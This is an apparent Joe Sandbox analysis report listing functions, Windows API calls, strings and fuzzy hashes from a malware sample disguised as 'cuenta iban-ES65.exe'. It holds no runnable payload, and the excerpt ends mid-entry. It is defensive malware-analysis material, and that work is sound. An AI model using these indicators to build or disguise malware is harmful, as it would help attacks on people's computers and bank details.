Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CharNext
String ID: Mundstykket.min
API String ID: 3213498283-3661976162
Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
Instruction ID: db1d673f1cc138dbc44dca3842ff1338afb0bbfba97f9f865265ae6769849a0e
Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
Instruction Fuzzy Hash: 8AF06253908F916AFB3272350C84B6B5B89CB55351F1C847BEE41AA2D2827C58608F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
GetTickCount.KERNEL32 ref: 00402C33
CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
ShowWindow.USER32(00000000,00000005), ref: 00402C5E

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
Instruction ID: 945901cf9e20f70a46e78403882e62b60873afe576e8e7cbc1612cb0b63c5969
Opcode Fuzzy Hash: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
Instruction Fuzzy Hash: 14F03A30809631ABD622AB34BF8EDDE7A64AB41B01B1184B7F014B21E4D77C58C6CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 004035F7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,77303410,00000000,C:\Users\user\AppData\Local\Temp\,004035CF,004033E9,?), ref: 00403611
GlobalFree.KERNEL32(008E5110), ref: 00403618

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004035F7

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
Instruction ID: f0c2977cb20e6558c2e773556eb83bc0584892ec035bd6653f77e23ad75a478d
Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
Instruction Fuzzy Hash: 1DE0C233905120ABC6315F44FE0472A7B7CAF48B22F020067EC447B3A087786C528BCC

Uniqueness

Uniqueness Score: -1.00%

Function 004057C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta iban-ES65.exe,C:\Users\user\Desktop\cuenta iban-ES65.exe,80000000,00000003), ref: 004057CB
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta iban-ES65.exe,C:\Users\user\Desktop\cuenta iban-ES65.exe,80000000,00000003), ref: 004057D9

Strings

C:\Users\user\Desktop, xrefs: 004057C5

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: d39d8f188df628cf061828239c0557f0f3bbaa41193ad9941d070ee56f497fe5
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: E5D0A772408D706EF30352109C04B8F6A48CF26300F090463F040A3191C27C5D424BBE

Uniqueness

Uniqueness Score: -1.00%

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000000.00000002.13169077201.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.13169049421.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169106504.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169135539.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_cuenta iban-ES65.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004058E4 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040590C
CharNextA.USER32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040591D
lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction ID: 7adaab352aa717b916c044831a99f4991ef712c09a2c9b56ba9fed1a583d178e
Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction Fuzzy Hash: 43F09636505518FFC7129FA5DC0099EBBB8EF16360B2540B9F801F7360D674EE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cuenta iban-ES65.exePID: 5520, Parent PID: 3036COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	21.7%
Total number of Nodes:	115
Total number of Limit Nodes:	0

Executed Functions

Function 377734E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 377734EA

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 83e1d71a42742fba59ea5c1c3f9287e7ecb8ab66b2acd9b0816e9e7ebacd56a2
Instruction ID: d51ddc19b66e8db60a4533ef1096bb853b535e00565170ea312911f94802abbc
Opcode Fuzzy Hash: 83e1d71a42742fba59ea5c1c3f9287e7ecb8ab66b2acd9b0816e9e7ebacd56a2
Instruction Fuzzy Hash: 5990027162510462D5006259861570A100547D0201F61C926A0418968EC7A5895575A2

Uniqueness

Uniqueness Score: -1.00%

Function 37772D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 37772D1A

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3abce09589951790d87e9e7ef76d7ba057f751d34f669c1ac638ce04a33ee9e7
Instruction ID: 8af9eda04015aaa02e50a5426411f0e60e03acc542812ae3aece17b26462c4fb
Opcode Fuzzy Hash: 3abce09589951790d87e9e7ef76d7ba057f751d34f669c1ac638ce04a33ee9e7
Instruction Fuzzy Hash: 1C90027122100473D5116259860570B000947D0241F91C927A0418958ED6668956B121

Uniqueness

Uniqueness Score: -1.00%

Function 37772B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 37772B9A

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ded1a39091025e399363a6f8b1449ee36e7a850f22fd12687f64855268754638
Instruction ID: 0c04b92ffd11e41b7bdb6541feaeba62d6c6dc26820d82da47fefa3843faf068
Opcode Fuzzy Hash: ded1a39091025e399363a6f8b1449ee36e7a850f22fd12687f64855268754638
Instruction Fuzzy Hash: 4B90027122108862D5106259C50574E000547D0301F55C926A4418A58EC6A588957121

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 37768540 Relevance: 17.7, Strings: 14, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Thread identifier, xrefs: 377A5345
Invalid debug info address of this critical section, xrefs: 377A52C1
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 377A5215, 377A52A1, 377A5324
double initialized or corrupted critical section, xrefs: 377A5313
corrupted critical section, xrefs: 377A52CD
Critical section address., xrefs: 377A530D
undeleted critical section in freed memory, xrefs: 377A5236
8, xrefs: 377A50EE
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 377A52ED
Critical section debug info address, xrefs: 377A522A, 377A5339
Thread is in a state in which it cannot own a critical section, xrefs: 377A534E
Address of the debug info found in the active list., xrefs: 377A52B9, 377A5305
Critical section address, xrefs: 377A5230, 377A52C7, 377A533F
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 377A52D9

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: d787828cf73b7a9c1422d0fcdd8af7ca7c13ba4925a8bd51a3dd1bf9f8f896eb
Instruction ID: 9b98496cf285a552e2961d1b627d55a388b7e1ccab0025be6f3f85131a874c6b
Opcode Fuzzy Hash: d787828cf73b7a9c1422d0fcdd8af7ca7c13ba4925a8bd51a3dd1bf9f8f896eb
Instruction Fuzzy Hash: 26819CB1A00348AFEB50CF94C884BAEBBB5FB48764F20465AF804BF640D778A945DB51

Uniqueness

Uniqueness Score: -1.00%

Function 377DFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 377DFE28

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 377DFF3A
HEAP: , xrefs: 377DFF26, 377E0035, 377E015D, 377E0202, 377E0259
HEAP[%wZ]: , xrefs: 377DFF19, 377E0028, 377E0150, 377E01F5, 377E024C
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 377E0053
Just reallocated block at %p to %Ix bytes, xrefs: 377E0171
RtlReAllocateHeap, xrefs: 377DFE3F, 377DFEE2
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 377E021F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 377E026A

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 36e84c390ba7251717408b800e19ea59f97748f94bbe558a41adc90bfec86b3f
Instruction ID: 01e081cb90cc12e57e054d1315c0bad7b610be897853e9489a8bcef1519757ae
Opcode Fuzzy Hash: 36e84c390ba7251717408b800e19ea59f97748f94bbe558a41adc90bfec86b3f
Instruction Fuzzy Hash: 4AD12479500649DFCB02CFA4C444BADBBF6FF49720F248849E494AFA22D739A942DF11

Uniqueness

Uniqueness Score: -1.00%

Function 37760E50 Relevance: 13.3, Strings: 10, Instructions: 764COMMON

Download Yara Rule

Strings

w, xrefs: 37760EDA
9, xrefs: 37760EBC
!, xrefs: 37760EC6
, xrefs: 37760F0C
%%%u, xrefs: 377A12D6
%, xrefs: 37760E9E
h, xrefs: 37760ED0
0, xrefs: 37760EB2
l, xrefs: 37760EE4
%%%u!%s!, xrefs: 377A12AB

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
API String ID: 0-360209818
Opcode ID: 2f528095d123d25f33b5955e98895c030b463e7ee1a506dfb3d7860ee1025915
Instruction ID: 9b018756b27da7cb5b0a4e584d46cba8ca6602bc347a344b1c0f6b63a490cd0e
Opcode Fuzzy Hash: 2f528095d123d25f33b5955e98895c030b463e7ee1a506dfb3d7860ee1025915
Instruction Fuzzy Hash: 6E6281B5E002298FFB64CF14C8457A9B7B3AF95324F5046DAD448AF384DB725AA1CF41

Uniqueness

Uniqueness Score: -1.00%

Function 3772D2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON

Download Yara Rule

Strings

PreferredUILanguagesPending, xrefs: 3778A66D
@, xrefs: 3772D389
Control Panel\Desktop\MuiCached, xrefs: 3772D5CB
Control Panel\Desktop, xrefs: 3772D3FD
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3772D356
@, xrefs: 3772D43D
PreferredUILanguages, xrefs: 3772D458, 3772D465
MachinePreferredUILanguages, xrefs: 3772D625
h.u7, xrefs: 3772D56A
@, xrefs: 3772D603

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.u7
API String ID: 0-3024877868
Opcode ID: fc9e1fa0d5823bbb741ed3f9199d3ee71af398e05ebb5eac338342248f28faec
Instruction ID: 33eaf8f68b75d887ab52867496577e27c9c8018cbae15678ae71a3828766f22b
Opcode Fuzzy Hash: fc9e1fa0d5823bbb741ed3f9199d3ee71af398e05ebb5eac338342248f28faec
Instruction Fuzzy Hash: 73B18EB1608341AFD711CF24C484B5FB7E9AF84768F41492EF8A4EB240DB74D948DB92

Uniqueness

Uniqueness Score: -1.00%

Function 377D86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

heapType, xrefs: 377D874B
runtimebroker.exe, xrefs: 377D86F3
services.exe, xrefs: 377D8716
DefaultBrowser_NOPUBLISHERID, xrefs: 377D8880
SegmentHeap, xrefs: 377D8769
smss.exe, xrefs: 377D870B
lsass.exe, xrefs: 377D8721
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 377D8750
svchost.exe, xrefs: 377D86E8
csrss.exe, xrefs: 377D8700

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 8b6385808a36b553d4d1f2cc57535bcc5b48daa57fda6b39135e804a09c2a95d
Instruction ID: d5515b9c97ae2fd4c8ecc4e017ae467f12f88a2ca1d0c7894c258d7886299d18
Opcode Fuzzy Hash: 8b6385808a36b553d4d1f2cc57535bcc5b48daa57fda6b39135e804a09c2a95d
Instruction Fuzzy Hash: 0651ACB55143119BE325DF188844BABBBEDFB84360F004E2DF9988B151E734E644DBD2

Uniqueness

Uniqueness Score: -1.00%

Function 3772640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3772651C

Part of subcall function 37726565: RtlDebugPrintTimes.NTDLL ref: 37726614
Part of subcall function 37726565: RtlDebugPrintTimes.NTDLL ref: 3772665F

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3778977C
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 377897B9
LdrpInitShimEngine, xrefs: 37789783, 37789796, 377897BF
Getting the shim engine exports failed with status 0x%08lx, xrefs: 37789790
minkernel\ntdll\ldrinit.c, xrefs: 377897A0, 377897C9
apphelp.dll, xrefs: 37726446

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 5e1c0b5e484c649cf68b6574f4afb5590cddcb70d8e50c7335d096a35e9192e0
Instruction ID: e9b0cef2a5d80ce9add1e4dd1db190a0ad423c96ba09338812e36ab1d6ba94ca
Opcode Fuzzy Hash: 5e1c0b5e484c649cf68b6574f4afb5590cddcb70d8e50c7335d096a35e9192e0
Instruction Fuzzy Hash: EC51BE71248300AFE320DF24C896B6A7BE4FB84654F40492EF994AF560EB34E904DF93

Uniqueness

Uniqueness Score: -1.00%

Function 377E0E6D Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 377E1286, 377E12D6, 377E1328, 377E1389, 377E13CD, 377E1415, 377E1466
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 377E1478
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 377E13EB
Heap block at %p is not last block in segment (%p), xrefs: 377E1337
Heap block at %p has incorrect segment offset (%x), xrefs: 377E139A
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 377E1425
HEAP[%wZ]: , xrefs: 377E124D, 377E1279, 377E12C9, 377E131B, 377E137C, 377E13C0, 377E1459
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 377E12ED
Free Heap block %p modified at %p after it was freed, xrefs: 377E129B

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
